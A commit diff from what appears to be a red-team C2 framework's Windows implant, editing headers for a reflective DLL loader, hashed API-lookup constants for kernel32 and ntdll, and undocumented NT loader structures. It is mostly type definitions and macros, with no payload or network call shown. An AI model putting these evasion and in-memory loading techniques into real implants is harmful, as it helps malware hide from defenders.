edit rfl.cpp

hideckies · May 20, 2024 · 6ef437e · 6ef437e
1 parent 716b19d
commit 6ef437e
Show file tree

Hide file tree

Showing 12 changed files with 399 additions and 291 deletions.
diff --git a/payload/win/implant/include/core/macros.hpp b/payload/win/implant/include/core/macros.hpp
@@ -5,16 +5,25 @@
 #define DLLEXPORT extern "C" __declspec(dllexport)
 
 // FUNCTIONS
-#define MALLOC(x) HeapAlloc(GetProcessHeap(), 0, (x))
-
 #define FREE(x) HeapFree(GetProcessHeap(), 0, (x))
+#define MALLOC(x) HeapAlloc(GetProcessHeap(), 0, (x))
 
-#define WIDEN(x) WIDEN2(x)
-#define WIDEN2(x) L##x
+#define DEREF(name)*(UINT_PTR *)(name)
+#define DEREF_64(name)*(DWORD64 *)(name)
+#define DEREF_32(name)*(DWORD *)(name)
+#define DEREF_16(name)*(WORD *)(name)
+#define DEREF_8(name)*(BYTE *)(name)
 
 #define HTONS16( x ) __builtin_bswap16( x )
 #define HTONS32( x ) __builtin_bswap32( x )
 
+#ifndef TO_LOWERCASE
+#define TO_LOWERCASE(c1, out) (out = (c1 <= 'Z' && c1 >= 'A') ? c1 = (c1 - 'A') + 'a': c1)
+#endif
+
+#define WIDEN(x) WIDEN2(x)
+#define WIDEN2(x) L##x
+
 // PAYLOAD FLAGS
 #ifdef PAYLOAD_TYPE
 #define PAYLOAD_TYPE_W WIDEN(PAYLOAD_TYPE)

diff --git a/payload/win/implant/include/core/nt.hpp b/payload/win/implant/include/core/nt.hpp
@@ -497,23 +497,20 @@ typedef enum _FILE_INFORMATION_CLASS
     FileMaximumInformation
 } FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS;
 
-typedef struct _PS_ATTRIBUTE
+typedef enum _LDR_DLL_LOAD_REASON
 {
-    ULONG_PTR Attribute;
-    SIZE_T Size;
-    union
-    {
-        ULONG_PTR Value;
-        PVOID ValuePtr;
-    };
-    PSIZE_T ReturnLength;
-} PS_ATTRIBUTE, *PPS_ATTRIBUTE;
-
-typedef struct _PS_ATTRIBUTE_LIST
-{
-    SIZE_T TotalLength;
-    PS_ATTRIBUTE Attributes[1];
-} PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;
+    LoadReasonStaticDependency,
+    LoadReasonStaticForwarderDependency,
+    LoadReasonDynamicForwarderDependency,
+    LoadReasonDelayloadDependency,
+    LoadReasonDynamicLoad,
+    LoadReasonAsImageLoad,
+    LoadReasonAsDataLoad,
+    LoadReasonEnclavePrimary, // since REDSTONE3
+    LoadReasonEnclaveDependency,
+    LoadReasonPatchImage, // since WIN11
+    LoadReasonUnknown = -1
+} LDR_DLL_LOAD_REASON, *PLDR_DLL_LOAD_REASON;
 
 typedef enum _NT_PRODUCT_TYPE
 {
@@ -522,13 +519,6 @@ typedef enum _NT_PRODUCT_TYPE
     NtProductServer
 } NT_PRODUCT_TYPE, *PNT_PRODUCT_TYPE;
 
-typedef struct _KSYSTEM_TIME
-{
-    ULONG LowPart;
-    LONG High1Time;
-    LONG High2Time;
-} KSYSTEM_TIME, *PKSYSTEM_TIME;
-
 typedef enum _KWAIT_REASON
 {
     Executive,
@@ -634,6 +624,66 @@ typedef enum _SYSDBG_COMMAND
     SysDbgGetLiveKernelDump
 } SYSDBG_COMMAND, * PSYSDBG_COMMAND;
 
+typedef enum _LDR_HOT_PATCH_STATE
+{
+    LdrHotPatchBaseImage,
+    LdrHotPatchNotApplied,
+    LdrHotPatchAppliedReverse,
+    LdrHotPatchAppliedForward,
+    LdrHotPatchFailedToPatch,
+    LdrHotPatchStateMax,
+} LDR_HOT_PATCH_STATE, *PLDR_HOT_PATCH_STATE;
+
+typedef enum _LDR_DDAG_STATE
+{
+    LdrModulesMerged = -5,
+    LdrModulesInitError = -4,
+    LdrModulesSnapError = -3,
+    LdrModulesUnloaded = -2,
+    LdrModulesUnloading = -1,
+    LdrModulesPlaceHolder = 0,
+    LdrModulesMapping = 1,
+    LdrModulesMapped = 2,
+    LdrModulesWaitingForDependencies = 3,
+    LdrModulesSnapping = 4,
+    LdrModulesSnapped = 5,
+    LdrModulesCondensed = 6,
+    LdrModulesReadyToInit = 7,
+    LdrModulesInitializing = 8,
+    LdrModulesReadyToRun = 9
+} LDR_DDAG_STATE;
+
+typedef struct
+{
+	WORD	offset:12;
+	WORD	type:4;
+} IMAGE_RELOC, *PIMAGE_RELOC;
+
+typedef struct _PS_ATTRIBUTE
+{
+    ULONG_PTR Attribute;
+    SIZE_T Size;
+    union
+    {
+        ULONG_PTR Value;
+        PVOID ValuePtr;
+    };
+    PSIZE_T ReturnLength;
+} PS_ATTRIBUTE, *PPS_ATTRIBUTE;
+
+typedef struct _PS_ATTRIBUTE_LIST
+{
+    SIZE_T TotalLength;
+    PS_ATTRIBUTE Attributes[1];
+} PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;
+
+typedef struct _KSYSTEM_TIME
+{
+    ULONG LowPart;
+    LONG High1Time;
+    LONG High2Time;
+} KSYSTEM_TIME, *PKSYSTEM_TIME;
+
 typedef struct _CLIENT_ID
 {
     HANDLE UniqueProcess;
@@ -1274,6 +1324,135 @@ typedef struct _TEB
     ULONGLONG ExtendedFeatureDisableMask;
 } TEB, *PTEB;
 
+typedef BOOLEAN (NTAPI *PLDR_INIT_ROUTINE)(
+    _In_ PVOID DllHandle,
+    _In_ ULONG Reason,
+    _In_opt_ PVOID Context
+);
+
+typedef struct _LDRP_LOAD_CONTEXT *PLDRP_LOAD_CONTEXT;
+
+typedef struct _LDRP_CSLIST
+{
+    PSINGLE_LIST_ENTRY Tail;
+} LDRP_CSLIST, *PLDRP_CSLIST;
+
+typedef struct _LDR_SERVICE_TAG_RECORD
+{
+    struct _LDR_SERVICE_TAG_RECORD *Next;
+    ULONG ServiceTag;
+} LDR_SERVICE_TAG_RECORD, *PLDR_SERVICE_TAG_RECORD;
+
+typedef struct _LDR_DDAG_NODE
+{
+    LIST_ENTRY Modules;
+    PLDR_SERVICE_TAG_RECORD ServiceTagList;
+    ULONG LoadCount;
+    ULONG LoadWhileUnloadingCount;
+    ULONG LowestLink;
+    union
+    {
+        LDRP_CSLIST Dependencies;
+        SINGLE_LIST_ENTRY RemovalLink;
+    };
+    LDRP_CSLIST IncomingDependencies;
+    LDR_DDAG_STATE State;
+    SINGLE_LIST_ENTRY CondenseLink;
+    ULONG PreorderNumber;
+} LDR_DDAG_NODE, *PLDR_DDAG_NODE;
+
+typedef struct _RTL_BALANCED_NODE
+{
+    union
+    {
+        struct _RTL_BALANCED_NODE *Children[2];
+        struct
+        {
+            struct _RTL_BALANCED_NODE *Left;
+            struct _RTL_BALANCED_NODE *Right;
+        };
+    };
+    union
+    {
+        UCHAR Red : 1;
+        UCHAR Balance : 2;
+        ULONG_PTR ParentValue;
+    };
+} RTL_BALANCED_NODE, *PRTL_BALANCED_NODE;
+
+typedef struct _LDR_DATA_TABLE_ENTRY
+{
+    LIST_ENTRY InLoadOrderLinks;
+    LIST_ENTRY InMemoryOrderLinks;
+    LIST_ENTRY InInitializationOrderLinks;
+    PVOID DllBase;
+    PLDR_INIT_ROUTINE EntryPoint;
+    ULONG SizeOfImage;
+    UNICODE_STRING FullDllName;
+    UNICODE_STRING BaseDllName;
+    union
+    {
+        UCHAR FlagGroup[4];
+        ULONG Flags;
+        struct
+        {
+            ULONG PackagedBinary : 1;
+            ULONG MarkedForRemoval : 1;
+            ULONG ImageDll : 1;
+            ULONG LoadNotificationsSent : 1;
+            ULONG TelemetryEntryProcessed : 1;
+            ULONG ProcessStaticImport : 1;
+            ULONG InLegacyLists : 1;
+            ULONG InIndexes : 1;
+            ULONG ShimDll : 1;
+            ULONG InExceptionTable : 1;
+            ULONG ReservedFlags1 : 2;
+            ULONG LoadInProgress : 1;
+            ULONG LoadConfigProcessed : 1;
+            ULONG EntryProcessed : 1;
+            ULONG ProtectDelayLoad : 1;
+            ULONG ReservedFlags3 : 2;
+            ULONG DontCallForThreads : 1;
+            ULONG ProcessAttachCalled : 1;
+            ULONG ProcessAttachFailed : 1;
+            ULONG CorDeferredValidate : 1;
+            ULONG CorImage : 1;
+            ULONG DontRelocate : 1;
+            ULONG CorILOnly : 1;
+            ULONG ChpeImage : 1;
+            ULONG ChpeEmulatorImage : 1;
+            ULONG ReservedFlags5 : 1;
+            ULONG Redirected : 1;
+            ULONG ReservedFlags6 : 2;
+            ULONG CompatDatabaseProcessed : 1;
+        };
+    };
+    USHORT ObsoleteLoadCount;
+    USHORT TlsIndex;
+    LIST_ENTRY HashLinks;
+    ULONG TimeDateStamp;
+    PACTIVATION_CONTEXT EntryPointActivationContext;
+    PVOID Lock; // RtlAcquireSRWLockExclusive
+    PLDR_DDAG_NODE DdagNode;
+    LIST_ENTRY NodeModuleLink;
+    PLDRP_LOAD_CONTEXT LoadContext;
+    PVOID ParentDllBase;
+    PVOID SwitchBackContext;
+    RTL_BALANCED_NODE BaseAddressIndexNode;
+    RTL_BALANCED_NODE MappingInfoIndexNode;
+    ULONG_PTR OriginalBase;
+    LARGE_INTEGER LoadTime;
+    ULONG BaseNameHashValue;
+    LDR_DLL_LOAD_REASON LoadReason; // since WIN8
+    ULONG ImplicitPathOptions;
+    ULONG ReferenceCount; // since WIN10
+    ULONG DependentLoadFlags;
+    UCHAR SigningLevel; // since REDSTONE2
+    ULONG CheckSum; // since 22H1
+    PVOID ActivePatchImageBase;
+    LDR_HOT_PATCH_STATE HotPatchState;
+} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
+
 typedef struct BASE_RELOCATION_BLOCK {
 	DWORD PageAddress;
 	DWORD BlockSize;

diff --git a/payload/win/implant/include/core/procs.hpp b/payload/win/implant/include/core/procs.hpp
@@ -15,8 +15,8 @@
 #define RANDOM_ADDR 0xab10f29f
 
 // Generated by script/calc_hash.py
-#define HASH_MODULE_KERNEL32                  0xf4796887
-#define HASH_MODULE_NTDLL                     0x3cd7873f
+#define HASH_MODULE_KERNEL32                  0x5b0c4067
+#define HASH_MODULE_NTDLL                     0x493e52ff
 #define HASH_FUNC_LDRLOADDLL                  0x19cb5e59
 #define HASH_FUNC_NTADJUSTPRIVILEGESTOKEN     0x1b79f58d
 #define HASH_FUNC_NTALLOCATEVIRTUALMEMORY     0xf8829394
@@ -363,6 +363,7 @@ namespace Procs
 
     DWORD GetHashFromString(char* str);
     DWORD GetHashFromStringPtr(PVOID pStr, SIZE_T dwStrLen);
+    // PVOID GetModuleByHash(DWORD dwHash);
     PVOID GetProcAddressByHash(
         HMODULE hModule,
         DWORD   dwHash

diff --git a/payload/win/implant/include/rfl.hpp b/payload/win/implant/include/rfl.hpp
@@ -1,82 +1,25 @@
-#ifndef HERMIT_REFLECTIVE_HPP
-#define HERMIT_REFLECTIVE_HPP
+#ifndef HERMIT_RFL_HPP
+#define HERMIT_RFL_HPP
 
 #include "hermit.hpp"
 
 #include <windows.h>
 
-#define DEREF(name)*(UINT_PTR *)(name)
-#define DEREF_64(name)*(DWORD64 *)(name)
-#define DEREF_32(name)*(DWORD *)(name)
-#define DEREF_16(name)*(WORD *)(name)
-#define DEREF_8(name)*(BYTE *)(name)
-
 #define HASH_KEY 13
 
 #define HASH_KERNEL32DLL				0x6A4ABC5B
 #define HASH_NTDLLDLL					0x3CFA685D
 
-#define HASH_LOADLIBRARYA				0xEC0E4E8E
-#define HASH_GETPROCADDRESS				0x7C0DFCAA
-#define HASH_VIRTUALALLOC				0x91AFCA54
-#define HASH_NTFLUSHINSTRUCTIONCACHE	0x534C0AB8
-
-typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
-typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
-typedef LPVOID  (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
-typedef DWORD  (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG );
-
 typedef ULONG_PTR (WINAPI * REFLECTIVEDLLLOADER)();
 typedef BOOL (WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID);
 
-typedef struct
-{
-	WORD	offset:12;
-	WORD	type:4;
-} IMAGE_RELOC, *PIMAGE_RELOC;
-
 #pragma intrinsic( _rotr )
 
 __forceinline DWORD rotate(DWORD d)
 {
 	return _rotr(d, HASH_KEY);
 }
 
-__forceinline DWORD hash(char * c)
-{
-    DWORD h = 0;
-	do
-	{
-		h = rotate(h);
-        h += *c;
-	} while( *++c );
-
-    return h;
-}
-
 extern "C" LPVOID  ReflectiveCaller();
 
-// Additional ----------------------------------------------
-
-// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
-//__declspec( align(8) ) 
-typedef struct _LDR_DATA_TABLE_ENTRY_R
-{
-	//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
-	LIST_ENTRY InMemoryOrderModuleList;
-	LIST_ENTRY InInitializationOrderModuleList;
-	PVOID DllBase;
-	PVOID EntryPoint;
-	ULONG SizeOfImage;
-	UNICODE_STRING FullDllName;
-	UNICODE_STRING BaseDllName;
-	ULONG Flags;
-	SHORT LoadCount;
-	SHORT TlsIndex;
-	LIST_ENTRY HashTableEntry;
-	ULONG TimeDateStamp;
-} LDR_DATA_TABLE_ENTRY_R, *PLDR_DATA_TABLE_ENTRY_R;
-
-// ---------------------------------------------------------
-
-#endif // HERMIT_REFLECTIVE_HPP
+#endif // HERMIT_RFL_HPP